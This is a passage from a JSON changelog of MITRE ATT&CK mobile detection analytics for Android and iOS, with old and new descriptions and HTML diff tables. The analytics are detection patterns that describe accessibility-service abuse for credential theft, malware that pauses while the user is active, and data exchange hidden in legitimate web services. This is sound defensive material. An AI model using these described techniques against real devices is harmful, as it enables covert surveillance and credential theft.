                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to138__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to138__0\"><a href=\"#difflib_chg_to138__top\">t</a></td><td class=\"diff_header\" id=\"from138_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;to&nbsp;use&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to138__top\">t</a></td><td class=\"diff_header\" id=\"to138_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;or&nbsp;supervised-device&nbsp;cam</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;camera&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;where&nbsp;the&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">era&nbsp;access&nbsp;with&nbsp;app&nbsp;and&nbsp;device&nbsp;context&nbsp;showing&nbsp;that&nbsp;the&nbsp;capt</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">r&nbsp;can&nbsp;then&nbsp;choose&nbsp;to&nbsp;revoke&nbsp;the&nbsp;permissions.&nbsp;During&nbsp;the&nbsp;vett</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ure&nbsp;is&nbsp;inconsistent&nbsp;with&nbsp;expected&nbsp;user-driven&nbsp;recording&nbsp;beha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing&nbsp;process,&nbsp;applications&nbsp;using&nbsp;the&nbsp;Android&nbsp;permission&nbsp;`andr</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vior.&nbsp;The&nbsp;strongest&nbsp;iOS&nbsp;evidence&nbsp;is&nbsp;camera&nbsp;access&nbsp;or&nbsp;camera-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">oid.permission.CAMERA`,&nbsp;or&nbsp;the&nbsp;iOS&nbsp;`NSCameraUsageDescription</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">adjacent&nbsp;capture&nbsp;activity&nbsp;followed&nbsp;by&nbsp;app-state&nbsp;evidence&nbsp;suc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">`&nbsp;plist&nbsp;entry&nbsp;could&nbsp;be&nbsp;given&nbsp;closer&nbsp;scrutiny.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">h&nbsp;as&nbsp;background&nbsp;or&nbsp;low-interaction&nbsp;operation,&nbsp;optional&nbsp;media</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;artifact&nbsp;creation,&nbsp;and&nbsp;optional&nbsp;post-capture&nbsp;network&nbsp;transf</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er.&nbsp;Because&nbsp;direct&nbsp;low-level&nbsp;runtime&nbsp;visibility&nbsp;is&nbsp;weaker&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">an&nbsp;Android&nbsp;for&nbsp;many&nbsp;enterprises,&nbsp;the&nbsp;primary&nbsp;iOS&nbsp;analytic&nbsp;sh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ould&nbsp;anchor&nbsp;on&nbsp;managed&nbsp;app&nbsp;context,&nbsp;device&nbsp;state,&nbsp;and&nbsp;downst</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ream&nbsp;effects&nbsp;around&nbsp;camera&nbsp;use,&nbsp;with&nbsp;local&nbsp;subsystem&nbsp;telemet</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ry&nbsp;treated&nbsp;as&nbsp;enrichment&nbsp;rather&nbsp;than&nbsp;sole&nbsp;proof.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7d2231b0-d62e-4d5f-bc26-99e7f14ec741",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-06 19:21:56.951000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0697#AN1812",
                            "external_id": "AN1812"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1812",
                    "description": "A defender correlates an application being granted accessibility service control with subsequent consumption of high-volume accessibility events, interaction with sensitive UI elements or text-entry fields, optional overlay/window presentation over other applications, and near-term local buffering or outbound network transmission, indicating abuse of accessibility features for input capture, credential theft, or automated interaction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AllowedAccessibilityApps",
                            "description": "Allow-list of sanctioned accessibility-enabled apps in the environment, such as screen readers or approved assistive tools."
                        },
                        {
                            "field": "AccessibilityEventRateThreshold",
                            "description": "Threshold for event volume or sustained event consumption indicating broad UI monitoring rather than limited assistive use."
                        },
                        {
                            "field": "SensitiveFieldCorrelationRequired",
                            "description": "Determines whether detection should require correlation to text-entry fields, login screens, or password/credential UI contexts."
                        },
                        {
                            "field": "OverlayCorrelationWindow",
                            "description": "Time window correlating accessibility activity with overlay/window presentation over other apps."
                        },
                        {
                            "field": "AccessibilityToNetworkWindow",
                            "description": "Time window linking accessibility event capture or text change activity to outbound network communication."
                        },
                        {
                            "field": "BackgroundServiceAllowed",
                            "description": "Tuning for whether background accessibility service activity is expected for approved assistive tools."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound byte volume or burst count considered suspicious after accessibility event capture."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"AllowedAccessibilityApps\", \"description\": \"Allow-list of sanctioned accessibility-enabled apps in the environment, such as screen readers or approved assistive tools.\"}, {\"field\": \"AccessibilityEventRateThreshold\", \"description\": \"Threshold for event volume or sustained event consumption indicating broad UI monitoring rather than limited assistive use.\"}, {\"field\": \"SensitiveFieldCorrelationRequired\", \"description\": \"Determines whether detection should require correlation to text-entry fields, login screens, or password/credential UI contexts.\"}, {\"field\": \"OverlayCorrelationWindow\", \"description\": \"Time window correlating accessibility activity with overlay/window presentation over other apps.\"}, {\"field\": \"AccessibilityToNetworkWindow\", \"description\": \"Time window linking accessibility event capture or text change activity to outbound network communication.\"}, {\"field\": \"BackgroundServiceAllowed\", \"description\": \"Tuning for whether background accessibility service activity is expected for approved assistive tools.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound byte volume or burst count considered suspicious after accessibility event capture.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-06 19:21:56.951000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender correlates an application being granted accessibility service control with subsequent consumption of high-volume accessibility events, interaction with sensitive UI elements or text-entry fields, optional overlay/window presentation over other applications, and near-term local buffering or outbound network transmission, indicating abuse of accessibility features for input capture, credential theft, or automated interaction.\", \"old_value\": \"Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\\nThe user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service should be scrutinized further for malicious behavior. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\\n-The user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service should be scrutinized further for malicious behavior. \\n+A defender correlates an application being granted accessibility service control with subsequent consumption of high-volume accessibility events, interaction with sensitive UI elements or text-entry fields, optional overlay/window presentation over other applications, and near-term local buffering or outbound network transmission, indicating abuse of accessibility features for input capture, credential theft, or automated interaction.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456\", \"name\": \"User Interface\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to141__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to141__0\"><a href=\"#difflib_chg_to141__top\">t</a></td><td class=\"diff_header\" id=\"from141_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;applications&nbsp;reque</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to141__top\">t</a></td><td class=\"diff_header\" id=\"to141_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;correlates&nbsp;an&nbsp;application&nbsp;being&nbsp;granted&nbsp;accessibi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sting&nbsp;the&nbsp;permissions&nbsp;granting&nbsp;access&nbsp;to&nbsp;accessibility&nbsp;servi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lity&nbsp;service&nbsp;control&nbsp;with&nbsp;subsequent&nbsp;consumption&nbsp;of&nbsp;high-vol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ces&nbsp;or&nbsp;application&nbsp;overlay.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;a&nbsp;list&nbsp;of&nbsp;devi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ume&nbsp;accessibility&nbsp;events,&nbsp;interaction&nbsp;with&nbsp;sensitive&nbsp;UI&nbsp;elem</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ce&nbsp;administrators&nbsp;and&nbsp;applications&nbsp;that&nbsp;have&nbsp;registered&nbsp;Acce</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ents&nbsp;or&nbsp;text-entry&nbsp;fields,&nbsp;optional&nbsp;overlay/window&nbsp;presentat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ssibility&nbsp;services&nbsp;in&nbsp;device&nbsp;settings.&nbsp;Applications&nbsp;that&nbsp;reg</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;over&nbsp;other&nbsp;applications,&nbsp;and&nbsp;near-term&nbsp;local&nbsp;buffering&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ister&nbsp;an&nbsp;Accessibility&nbsp;service&nbsp;should&nbsp;be&nbsp;scrutinized&nbsp;further</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;outbound&nbsp;network&nbsp;transmission,&nbsp;indicating&nbsp;abuse&nbsp;of&nbsp;accessi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;for&nbsp;malicious&nbsp;behavior.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">bility&nbsp;features&nbsp;for&nbsp;input&nbsp;capture,&nbsp;credential&nbsp;theft,&nbsp;or&nbsp;auto</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mated&nbsp;interaction.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--89ee35d2-02ec-4c36-b51c-50e686eb3012",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:28.435000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0699#AN1815",
                            "external_id": "AN1815"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1815",
                    "description": "Correlates (1) continuous or repeated use of motion or interaction-inference signals that do not require overt user-facing privilege prompts, (2) suppression of higher-risk behavior while user presence or active handling is inferred, and (3) resumption of background execution, sensor use, local data handling, or network activity only when device interaction falls below a threshold. The defender observes a causal chain where an application senses user/device interaction state and intentionally gates malicious behavior to user-inactive periods.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "application reduces or halts operational activity during periods of active user interaction and resumes background execution or periodic work only during low-motion or idle intervals"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between motion-state inference and subsequent deferred execution"
                        },
                        {
                            "field": "IdleThreshold",
                            "description": "Threshold defining when device motion or interaction is considered low enough to permit hidden execution"
                        },
                        {
                            "field": "InteractionSignalSet",
                            "description": "Environment-specific set of motion or activity signals used to infer user presence"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate applications expected to use motion or activity sensing while also conditionally changing behavior"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether suspiciousness increases when deferred activity starts from background or with no recent foreground interaction"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound traffic threshold used to distinguish meaningful deferred operation from benign maintenance traffic"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application reduces or halts operational activity during periods of active user interaction and resumes background execution or periodic work only during low-motion or idle intervals\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between motion-state inference and subsequent deferred execution\"}, {\"field\": \"IdleThreshold\", \"description\": \"Threshold defining when device motion or interaction is considered low enough to permit hidden execution\"}, {\"field\": \"InteractionSignalSet\", \"description\": \"Environment-specific set of motion or activity signals used to infer user presence\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate applications expected to use motion or activity sensing while also conditionally changing behavior\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether suspiciousness increases when deferred activity starts from background or with no recent foreground interaction\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound traffic threshold used to distinguish meaningful deferred operation from benign maintenance traffic\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:28.435000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) continuous or repeated use of motion or interaction-inference signals that do not require overt user-facing privilege prompts, (2) suppression of higher-risk behavior while user presence or active handling is inferred, and (3) resumption of background execution, sensor use, local data handling, or network activity only when device interaction falls below a threshold. The defender observes a causal chain where an application senses user/device interaction state and intentionally gates malicious behavior to user-inactive periods.\", \"old_value\": \"Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to149__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to149__0\"><a href=\"#difflib_chg_to149__top\">t</a></td><td class=\"diff_header\" id=\"from149_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;detect&nbsp;some&nbsp;forms&nbsp;of</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to149__top\">t</a></td><td class=\"diff_header\" id=\"to149_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;continuous&nbsp;or&nbsp;repeated&nbsp;use&nbsp;of&nbsp;motion&nbsp;or&nbsp;inter</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;user&nbsp;evasion.&nbsp;Otherwise,&nbsp;the&nbsp;act&nbsp;of&nbsp;hiding&nbsp;malicious&nbsp;activi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">action-inference&nbsp;signals&nbsp;that&nbsp;do&nbsp;not&nbsp;require&nbsp;overt&nbsp;user-faci</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ty&nbsp;could&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and&nbsp;therefore&nbsp;enterprises&nbsp;m</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;privilege&nbsp;prompts,&nbsp;(2)&nbsp;suppression&nbsp;of&nbsp;higher-risk&nbsp;behavio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ay&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;while&nbsp;user&nbsp;presence&nbsp;or&nbsp;active&nbsp;handling&nbsp;is&nbsp;inferred,&nbsp;and&nbsp;(3</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;resumption&nbsp;of&nbsp;background&nbsp;execution,&nbsp;sensor&nbsp;use,&nbsp;local&nbsp;data</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;handling,&nbsp;or&nbsp;network&nbsp;activity&nbsp;only&nbsp;when&nbsp;device&nbsp;interaction&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">falls&nbsp;below&nbsp;a&nbsp;threshold.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chai</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;where&nbsp;an&nbsp;application&nbsp;senses&nbsp;user/device&nbsp;interaction&nbsp;state&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">and&nbsp;intentionally&nbsp;gates&nbsp;malicious&nbsp;behavior&nbsp;to&nbsp;user-inactive&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">periods.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1f1d8e33-293a-4ceb-a91c-0cf71c6805ea",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-18 16:14:55.614000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0700#AN1816",
                            "external_id": "AN1816"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1816",
                    "description": "The defender correlates repeated inbound retrieval and outbound submission activity by the same Android app identity to the same legitimate public web-service class within a short operational window, where the two-way exchange is inconsistent with the app's approved role, interaction model, or background behavior baseline. The strongest Android evidence is app-attributed communication to collaboration, social, cloud storage, code-hosting, messaging, or generic HTTPS platforms where requests that retrieve content are followed by app-attributed posts, uploads, document updates, API writes, or repeated small bidirectional exchanges, especially when they occur while the app is backgrounded, while the device is locked, without recent user interaction, or shortly after local staging or protected-resource access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when bidirectional exchange with public web-service domain began and no foreground transition occurred between retrieval and outbound write"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
                        },
                        {
